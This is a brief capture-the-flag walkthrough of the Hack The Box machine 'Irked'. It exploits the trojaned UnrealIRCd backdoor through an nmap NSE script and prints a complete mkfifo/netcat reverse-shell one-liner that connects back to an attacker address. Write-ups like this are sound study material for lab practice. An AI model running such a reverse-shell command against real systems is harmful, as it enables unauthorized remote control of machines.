HTB: Irked
Irked
Irked was next after Shocker; I went in blind.
Ports
This box had four unusual ports and no standard ports. We had:
- 6697/tcp open irc UnrealIRCd
- 8067/tcp open irc UnrealIRCd
- 46013/tcp open status 1 (RPC #100024)
- 65534/tcp open irc UnrealIRCd
So it’s pretty much just UnrealIRCd, whatever that is.
Whatever that is
According to wikipedia:
UnrealIRCd is an open-source IRC daemon, originally based on DreamForge, and is available for Unix-like operating systems and Windows.
The wikipedia entry also notes:
The tarball of version 3.2.8.1, from November 2009 to June 12, 2010, contained a trojan that allowed people to execute commands with the privileges of the user running the daemon, regardless of any user restrictions. The problem was fixed - the current tarball download is not suspected to contain a trojan.
Hmmmm. Googling for the exploit reveals an nmap script that could be useful. I try it with a ping:
nmap -d -p6697 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='ping 10.10.14.10' irked.htb
Success!
Now it’s just a matter of finding a shell payload that works. This one does:
nmap -d -p6697 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 1234 >/tmp/f' irked.htb
But it’s the only one I could get to work.
Privesc
This was pretty easy (well, so was the foothold). Linpeas pointed out a binary, which I took a look at in Ghidra:
Here’s the privesc; it’s just about easier to show it then write it out:
Between this nmap script and another one I saw yesterday about enumerating wordpress plugins, there is more to NSE than I have been used to using.